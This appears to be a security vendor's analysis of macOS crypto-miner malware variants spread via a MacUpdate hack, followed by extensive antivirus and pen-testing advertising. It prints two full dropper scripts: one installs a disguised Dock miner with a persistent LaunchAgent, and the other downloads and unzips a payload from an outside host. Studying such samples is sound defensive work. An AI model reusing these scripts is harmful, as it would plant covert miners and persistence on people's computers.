A hack of the MacUpdate website was used to distribute new Mac crypto miners. After making some rigorous analysis, our cybersecurity team found out that this attack was just the tip of the iceberg. This new variant of mac is a culmination of something that has been around since October of last year. This new malware has 23 other variants.
The oldest of the variants is niceass.zip. After analyzing this variant, we found out that it contains two files: an image file called: ass.jpg and a broken application named: temp.app
The temp.app does not work, but its contents are intriguing: an ass.jpg image, a file named com.zerowidth.launched.apple.plist which is a launch agent .plist file, an executable named Dock which has the same name as the Apple process that manages the Dock, and a Frameworks folder containing some external framework code that must be needed by the Dock executable.
The file ass.jpg is not an actually JPEG file, it is a shell script:
nohup mv ~/Downloads/niceass/temp.app ~/Downloads/niceass/.tmp
mv ~/Downloads/niceass/.tmp/Apple ~/Library &&
mkdir -p ~/Library/LaunchAgents &&
mv ~/Library/Apple/com.zerowidth.launched.apple.plist ~/Library/LaunchAgents &&
launchctl load -w ~/Library/LaunchAgents/com.zerowidth.launched.apple.plist &&
rm -rf ~/Downloads/niceass/.tmp &&
rm ~/Downloads/niceass/ass.jpg &&
mv ~/Library/Apple/ass.jpg ~/Downloads/niceass &&
open -a Preview ~/Downloads/niceass/ass.jpg &&
~/Library/Apple/Dock -user [email protected]@gmail.com -xmr &
This script will run from within the niceass folder, and its first move is to rename temp.app to: .tmp, doing this the app will be more stealthy. The second step is to move various components out of the niceass folder and into the specified locations, for example, the launch agent.plist file is installed and loaded in it’s defined place. The third move is to replace the ass.jpg file with the ass.jpg file from inside the Apple folder and then open it in Preview. The final step is launching the malicious Dock process that is an email address as the username to log in to Minergate which uses as much CPU time as it can to mine the Monero cryptocurrency.
The way it is run ass.jpg is brilliant is an honest-to-goodness .jpg extension. It is effortless to override this extension by using the Get Info window and changing the application used to open the particular file.
Doing this the file will be saved with special metadata settings, and after compressing the file into a zip file using a Mac, that metadata will be stored in some special files added to the zip file, and it will be reconstructed on another Mac when decompressed. This metadata can be viewed using the command line xattr -l that will display this:
00000000 62 70 6C 69 73 74 30 30 D3 01 02 03 04 05 06 57 |bplist00…….W|
00000010 76 65 72 73 69 6F 6E 54 70 61 74 68 5F 10 10 62 |versionTpath_..b|
00000020 75 6E 64 6C 65 69 64 65 6E 74 69 66 69 65 72 10 |undleidentifier.|
00000030 00 5F 10 24 2F 41 70 70 6C 69 63 61 74 69 6F 6E |._.$/Application|
00000040 73 2F 55 74 69 6C 69 74 69 65 73 2F 54 65 72 6D |s/Utilities/Term|
00000050 69 6E 61 6C 2E 61 70 70 5F 10 12 63 6F 6D 2E 61 |inal.app_..com.a|
00000060 70 70 6C 65 2E 54 65 72 6D 69 6E 61 6C 08 0F 17 |pple.Terminal…|
00000070 1C 2F 31 58 00 00 00 00 00 00 01 01 00 00 00 00 |./1X…………|
00000080 00 00 00 07 00 00 00 00 00 00 00 00 00 00 00 00 |…………….|
00000090 00 00 00 6D |…m|
This is not a highly sophisticated malware but let’s not forget that is the less sophisticated one and there are 22 better variants of it.
The next one is serial.zip, it works similarly, but the suspicious temp.app was renamed to “.temp.app” to hide it from the user’s view. This variant also replaces the nasty ass.jpg photo with a text file containing a serial number.
Next variant is a JPEG file disrtibuted trough WhatsApp, under the name of WhatsApp Image 2017-12-23 at 13.31.15.jpeg. This JPEG file does not use the temp.app, instead it is downloading the payloads from public.adobecc.com, and then downloads and open a decoy image from www.askideas.com. This variant uses this script:
nohup rm -rf ~/Downloads/WhatsApp\ Image\ 2017-12-23\ at\ 13.31.15.jpeg &&
curl -o ~/Downloads/WhatsApp\ Image\ 2017-12-23\ at\ 13.31.15.jpeg https://www.askideas.com/media/38/I-Killed-Black-Snake-Why-U-Not-Happy-Funny-Pet-Meme-Image-For-Whatsapp.jpg &&
open -a Preview ~/Downloads/WhatsApp\ Image\ 2017-12-23\ at\ 13.31.15.jpeg &&
curl -o ~/Library/1.zip https://public.adobecc.com/files/1UFRTMCE4GD4DBFSPQVFGD2FYYVFFF?content_disposition=attachment &&
cd ~/Library &&
unzip ~/Library/1.zip &&
rm -rf ~/Library/1.zip &&
mkdir -p ~/Library/LaunchAgents &&
mv ~/Library/GoogleSoftwareUpdateAgent.plist ~/Library/LaunchAgents &&
launchctl load -w ~/Library/LaunchAgents/GoogleSoftwareUpdateAgent.plist &
This variant still relays on the MacOSupdate.plist and MacOS.plist launch agents. The other 19 variants are similar to the WhatsApp variant.
The final variant is a single file named link-to-download.txt, and it has similarities with both the WhatsApp and serial/niceass variants.
We strongly recommend the install an antivirus for Mac to protect against this types of malware that can turn in into a crypto miner in under a second.
Identified Dropped files:
Regular users are the most affected by malware this day because most of them do not care about what antivirus they have installed in their systems.
Users can download antivirus developed by our company directly by clicking the download banner from the end of the page.
Our free download antivirus can help users to protect their Mac or Windows devices against malware and adware.
We offer a free antivirus one day license to all our users who want to test the full power of our antivirus solution.
Our antivirus can detect a vast spectrum of threats, from dangerous malware to nasty browsers extensions used for mining the crypto-currency.
The antivirus our company is offered is a certified product of OPSWAT.
Most of the companies don't care about cybersecurity until they suffer a breach.
A healthy company must perform a penetration test from time to time. The penetration test must execute against all the assets of the company, including the workers who are the most vulnerable to the social engineering attacks.
A penetration test can be done either by a security specialist from inside of the company or by hiring an external cyber security company who can take care of everything.
Besides penetration test, a company must have a minimum healthy cybersecurity system installed like antivirus or firewall.
CyberByte company can perform various penetration tests on all the spectrum of PCI/DSS compliance to the red team, perimeter testing, and social engineering.
We also provide services to employee profiling and cyber threat monitoring, since most of the data breaches this day come from the inside of the company.
To check our penetration test services go to the Services tab from the main menu.
Windows users can download free antivirus solution CyberByte by clicking the banner. The free antivirus will help you to know if your PC is infected. Windows free antivirus of CyberByte is an awarded software for malware detection.
Mac / MacOS / OS X users can download free Mac antivirus solution CyberByte by clicking the banner. The free antivirus will help you to know if your Mac is infected. MacOS / OS X free antivirus of CyberByte is an awarded software for malware detection. The free antivirus for Mac is available for new MacOS and older OS X versions.
Features of CyberByte™ antivirus:
- Protects you from all kind of threats
- CyberByte™ custom detection engine includes Mac and Windows malware protection and detection
- Fastest scanning times in the market
- Crypto Mining rogue extensions/malware detection
- Ransomware detection - don’t negotiate with ransomware cyber terrorists – keep your Mac and Windows safe
- Active live protection from background
- Certified Threat Detector by OPSWAT
- Easy to Install
- Easy to Manage
- Incredible value for money
Invisible, protecting you from behind the scenes - You will not feel it is installed on your computer, easy on the resources, like a protection software should be.
Original technology that combines behavioral heuristic analysis with powerful signatures database – the CyberByte™ Protection Engine delivers top of the line protection in an instant.
Fastest scanning times in the market – your time is precious, but also so is your digital life – CyberByte™ delivers fast scanning saving both time and your valuable data.
Don’t negotiate with ransomware cyber terrorists – keep your Mac safe and don’t ever end up paying for what is already yours.
Protect others as well – the CyberByte™ Protection Engine not only detects the threat but stops it from spreading to other Macs or Windows machines.
Don’t let strangers use your resources – more than 80% of the attacks are crypto mining driven. Are you sure your computer is not mining for crypto while you read this text?
Our malware protection will continuously look after your device providing the best security against viruses. Give us the chance to prove it by downloading the antivirus for your device.
CyberByte Antivirus is a certified product by OPSWAT (OPSWAT is a San Francisco-based software company that provides solutions to secure and manage IT infrastructure. Founded in 2002, OPSWAT delivers solutions that provide manageability of endpoints and networks, and that help organizations protect against
zero-day attacks by using multiple antivirus engine scanning and document sanitization.
To learn more about OPSWAT’s innovative and unique solutions, please visit http://www.opswat.com).
CyberByte Antivirus comes in two flavors:
MacOS Version - the free download Mac antivirus available on our website (https://mac.cyberbyte.org)
Windows Version - the free download Windows antivirus available on our website (https://pc.cyberbyte.org)
The procedure is simple:
Just free download antivirus from CyberByte website either for Mac or Windows.
Install it using the antivirus installer package.
Windows and Mac users will free malware scan their devices. The scan duration depends on how many files the end user has.
CyberByte antivirus will show if any files are infected after the scan is finished.